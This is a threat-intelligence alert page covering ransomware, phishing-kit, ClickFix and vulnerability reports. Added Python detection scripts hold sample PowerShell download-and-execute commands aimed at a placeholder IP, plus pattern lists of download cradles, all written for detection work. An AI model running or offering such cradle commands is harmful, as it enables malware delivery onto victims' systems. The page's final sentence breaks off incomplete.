Threat Alerts
Your place for the latest CyberProof cyber threat intelligence alerts and updates
Interlock Ransomware Exploits Zero-Day Vulnerability
The Interlock ransomware group continues targeting North American organizations through sophisticated multi-stage attacks. Unlike typical RaaS operations, this dedicated group develops custom malware and adapts techniques over time, demonstrating persistence through months-long intrusions that culminate in data theft and encryption.
Initial compromise occurs via MintLoader infections delivering NodeSnakeRAT through PowerShell download cradles. The malware establishes persistence using autorun entries and scheduled tasks with names mimicking legitimate Windows services. Attackers deploy multiple JavaScript-based RAT variants for command execution, SOCKS5 proxy capabilities, and system reconnaissance. After months of dormancy, operators escalate through ScreenConnect installation for GUI access, credential harvesting via custom browser infostealers, and lateral movement using valid domain accounts. The group employs a novel BYOVD tool called “Hotta Killer” that exploits CVE-2025-61155 (CVSS 5.5) in anti-cheat drivers to terminate security processes.
Ransomware deployment involves both Windows JavaScript variants and Linux ELF binaries targeting Nutanix hypervisors. The JavaScript ransomware uses hybrid AES-RSA encryption with partial file encryption for speed, while excluding critical system directories. Attackers exfiltrate over 250GB using AZcopy before large-scale deployment via PsExec commands across the domain.
Tycoon 2FA Kit Powers Gmail, M365 Phishing
A credential-harvesting campaign has been actively targeting Gmail and Microsoft 365 accounts using newly registered *.contractors domains and phishing pages powered by the Tycoon 2FA phishing kit. The operation represents a significant risk by combining MFA-aware credential theft with advanced evasion and anti-analysis techniques designed to bypass traditional detection controls. Its coordinated use of multiple domains and shared infrastructure highlights the maturity and persistence of modern phishing-as-a-service operations capable of scaling rapidly across organizations and individuals.
The campaign relies on tailored social engineering lures impersonating legitimate organizations and warning recipients of potential service disruption unless email verification is completed. Victims are directed to attacker-controlled URLs where their email addresses are embedded directly into personalized links, followed by a fake CAPTCHA page used as an intentional delay to defeat sandboxing and automated analysis. After passing this gate, targets encounter high-fidelity login pages with accurate branding, prefilled usernames, and multi-step authentication flows engineered to capture both credentials and MFA approvals. The underlying infrastructure actively detects analysis tools, debuggers, and sandbox environments, redirecting suspected analysis traffic to benign decoy pages instead of errors to evade detection and extend domain longevity. The consistent use of freshly registered domains, randomized subdomains, long URL paths, and synchronized registration timelines indicates a broader campaign footprint beyond the observed samples, underscoring the ongoing threat posed by sophisticated MFA-aware phishing frameworks.
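The indicators listed above (newly registered `*.contractors` domains, randomized subdomains, long URL paths, and the victim's e-mail address embedded in the link) can be turned into a simple triage heuristic for proxy or mail-gateway URL logs. The script below is an added example, not part of the CyberProof alert: the sample URLs are constructed for illustration and are not IoCs from the campaign, and the thresholds and TLD list are assumptions to tune against your own traffic.

```python
import math
import re
from urllib.parse import urlparse, unquote

# Constructed sample URLs (hypothetical; not indicators from the alert).
SAMPLE_URLS = [
    "https://x7kq9p2m.secure-mail-verify.contractors/auth/session/verify/continue/step2/index.php?user=alice%40example.com",
    "https://mail.example.com/owa/",
    "https://login.microsoftonline.com/common/oauth2/authorize",
    "https://a8f3z1.account-review.contractors/v/alice@example.com",
]

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# TLDs seen in the campaign; extend from your own threat intel (assumption: only .contractors here).
SUSPICIOUS_TLDS = {"contractors"}


def shannon_entropy(s):
    """Bits of entropy per character; random-looking labels score high."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_random(label):
    """Heuristic for generated subdomains: mixed letters/digits and high entropy."""
    return (len(label) >= 6
            and any(c.isdigit() for c in label)
            and any(c.isalpha() for c in label)
            and shannon_entropy(label) > 2.5)


def score_url(url):
    """Return (score, reasons) where each reason is one campaign indicator observed."""
    reasons = []
    p = urlparse(url)
    host = p.hostname or ""
    labels = host.split(".")
    tld = labels[-1] if labels else ""
    if tld in SUSPICIOUS_TLDS:
        reasons.append(f"tld:{tld}")
    # Leftmost label is the subdomain when the host has three or more labels.
    if len(labels) >= 3 and looks_random(labels[0]):
        reasons.append("random-subdomain")
    path_full = p.path + ("?" + p.query if p.query else "")
    if len(path_full) > 40 or p.path.count("/") >= 4:
        reasons.append("long-path")
    # The campaign pre-fills the login form from the e-mail address carried in the link.
    if EMAIL_RE.search(unquote(path_full)):
        reasons.append("embedded-email")
    return len(reasons), reasons


def triage(urls, threshold=2):
    """Return the URLs whose indicator count meets the threshold, with their reasons."""
    flagged = []
    for u in urls:
        score, reasons = score_url(u)
        if score >= threshold:
            flagged.append((u, reasons))
    return flagged


if __name__ == "__main__":
    for url, reasons in triage(SAMPLE_URLS):
        print(url, "->", ", ".join(reasons))
```

Requiring two or more indicators keeps legitimate long SaaS URLs out of the queue; a single `.contractors` hit on its own is a prompt for a registration-date lookup rather than an alert.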
Critical Sandbox Escapes in n8n Enable Full Remote Code Execution
Two critical sandbox escape vulnerabilities in the n8n workflow automation platform allow authenticated users to execute remote code on affected systems, bypassing safeguards designed to contain untrusted workflow logic and potentially leading to full host compromise. These sandbox escapes can expose sensitive credentials, APIs, and infrastructure from affected workflow engines.
The first vulnerability, designated CVE-2026-1470 (CVSS 9.9), affects n8n’s JavaScript expression engine, where flaws in expression sanitization enable attackers with workflow creation or editing permissions to escape the sandbox and execute arbitrary JavaScript on the host system [1]. The expression engine processes content within special blocks using a JavaScript Function constructor, relying on an AST-based sandbox to neutralize dangerous constructs, but a missed edge case involving the legacy JavaScript “with” statement allows attackers to bypass these protections.
A second vulnerability targets the Python Code node when configured in “Internal” execution mode, allowing authenticated users to bypass restrictions and run arbitrary code outside the sandbox. Tracked as CVE-2026-0863 (CVSS 8.5), this flaw particularly affects self-hosted enterprise deployments where internal execution mode is commonly used for performance and operational reasons.
TA584 Deploys Tsundere Bot Malware via ClickFix Campaigns
TA584, a sophisticated Initial Access Broker linked to Russian cybercriminal networks, has dramatically escalated operations in 2025 with campaign volumes tripling from March to December. The group deploys new malware called Tsundere Bot alongside advanced stealth techniques.
TA584 employs ClickFix social engineering tactics, tricking victims into executing PowerShell commands through fake error messages and CAPTCHA pages. The attack chain begins with phishing emails impersonating healthcare facilities, government agencies, and business services, containing unique URLs with geofencing and IP filtering. Upon clicking, victims encounter fabricated error prompts instructing them to copy malicious commands into Windows Run dialogs. This executes PowerShell scripts that download Node.js and deploy either XWorm or Tsundere Bot malware. The group uses compromised sender accounts and rapidly rotates infrastructure, lures, and delivery methods to evade detection.
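Both the Interlock chain (PowerShell download cradles) and the TA584 ClickFix chain (a user pasting a PowerShell command into the Run dialog, which then downloads Node.js) leave the same footprint in process-creation telemetry: a PowerShell process whose parent is `explorer.exe`, carrying download-cradle strings, window-hiding or execution-policy flags, or an encoded command. The detection below is an added example written for this alert, not CyberProof or vendor code; the events are constructed Sysmon-style records with documentation-range addresses, and the field names, pattern lists and two-indicator rule are assumptions to adapt to your own EDR schema.

```python
import base64
import re

CRADLE_PATTERNS = [
    r"\biwr\b", r"invoke-webrequest", r"downloadstring", r"downloadfile",
    r"net\.webclient", r"\biex\b", r"invoke-expression", r"start-bitstransfer",
    r"\bnode(\.exe|\.js|js)?\b",   # ClickFix chain fetches Node.js as its runtime
]
HIDE_PATTERNS = [
    r"-w(indowstyle)?\s+hidden", r"-ep\s+bypass", r"-executionpolicy\s+bypass",
    r"-nop\b", r"-noprofile",
]
ENC_RE = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def _encode_ps(script):
    """Build a -EncodedCommand payload (UTF-16LE, base64) for the constructed sample below."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified).
EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://203.0.113.10/setup.ps1 -UseBasicParsing | iex"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\agent.exe",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -ep bypass -enc "
                    + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/n.ps1')")},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd /c dir"},
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or '' if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le", errors="ignore")
    except ValueError:          # binascii.Error is a ValueError subclass
        return ""


def is_clickfix_like(event):
    """Return (hit, reasons). A hit needs an explorer.exe parent plus one more indicator."""
    image = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "")
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return False, []
    # Scan the visible command line and the decoded payload together.
    text = (cmd + " " + decode_encoded_command(cmd)).lower()
    reasons = []
    if parent.endswith("\\explorer.exe"):
        reasons.append("parent-explorer")      # Run dialog / user-pasted command
    if any(re.search(p, text) for p in CRADLE_PATTERNS):
        reasons.append("download-cradle")
    if any(re.search(p, text) for p in HIDE_PATTERNS):
        reasons.append("stealth-flags")
    if ENC_RE.search(cmd):
        reasons.append("encoded-command")
    hit = "parent-explorer" in reasons and len(reasons) >= 2
    return hit, reasons


def hunt(events):
    """Return (command line, reasons) for every event that matches."""
    results = []
    for e in events:
        hit, reasons = is_clickfix_like(e)
        if hit:
            results.append((e["CommandLine"], reasons))
    return results


if __name__ == "__main__":
    for cmdline, reasons in hunt(EVENTS):
        print(", ".join(reasons), "<-", cmdline[:80])
```

Pairing the `explorer.exe` parent with a second indicator is what separates a pasted ClickFix command from an administrator's scripted PowerShell launched by a management agent; decoding `-EncodedCommand` before matching matters because the cradle strings are otherwise invisible in the raw command line.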
Tsundere Bot represents a significant evolution in the threat landscape, utilizing blockchain technology for command-and-control communications through Ethereum smart contracts. The malware requires Node.js installation and employs WebSocket connections for C2 communication while checking system locale to avoid CIS countries. TA584 maintains persistence through invisible Windows Registry keys created by inserting null-byte characters, making malicious entries undetectable to standard enumeration tools. The group’s modular approach fetches payloads dynamically from external servers, creating effectively fileless infections that survive system reboots and complicate remediation efforts.
Microsoft Office Zero-Day Actively Exploited
A high-severity zero-day vulnerability in Microsoft Office, tracked as CVE-2026-21509 (CVSS 7.8), is being actively exploited in the wild, prompting Microsoft to release emergency security updates. The flaw allows attackers to bypass built-in security features by circumventing OLE mitigations that normally protect users from vulnerable COM/OLE controls. This vulnerability poses a significant risk to enterprise environments, as it enables attackers to abuse trusted Office functionality through malicious documents and undermines core protective mechanisms designed to prevent exploitation.
Exploitation requires threat actors to craft a malicious Office file and socially engineer victims into opening it, allowing the attacker to bypass security checks based on untrusted inputs. Users running Office 2021 and later versions receive protection through a service-side update that becomes effective after restarting Office applications, while organizations using Office 2016 and 2019 must manually apply patches or implement a registry-based mitigation to reduce exposure. Due to confirmed active exploitation, the vulnerability has been added to federal Known Exploited Vulnerabilities catalogs, requiring remediation by February 16, 2026. Although technical details of the in-the-wild attacks remain undisclosed, the enforced patching deadline and out-of-band response underscore the severity of this security feature bypass and its potential for widespread abuse across corporate environments.
Critical FortiCloud SSO Authentication Bypass Vulnerability Exploited ITW
A critical authentication bypass vulnerability, CVE-2026-24858 (CVSS Score 9.8), was disclosed by Fortinet affecting multiple Fortinet products including FortiOS, FortiAnalyzer, FortiManager, and FortiProxy. The flaw enables an unauthenticated threat actor with a valid FortiCloud account and a registered device to authenticate into other organizations’ devices, provided FortiCloud SSO is enabled. This breaks tenant isolation and allows cross-account administrative access.
While FortiCloud SSO is disabled by default, it is automatically enabled during FortiCare registration unless explicitly turned off, creating a widespread and often unnoticed exposure. Successful exploitation grants attackers privileged management access to core security infrastructure, enabling long-term persistence, lateral movement, security control tampering, and potential downstream compromise of protected networks. Given confirmed in-the-wild exploitation and the critical nature of affected products (firewalls, management platforms, and proxies).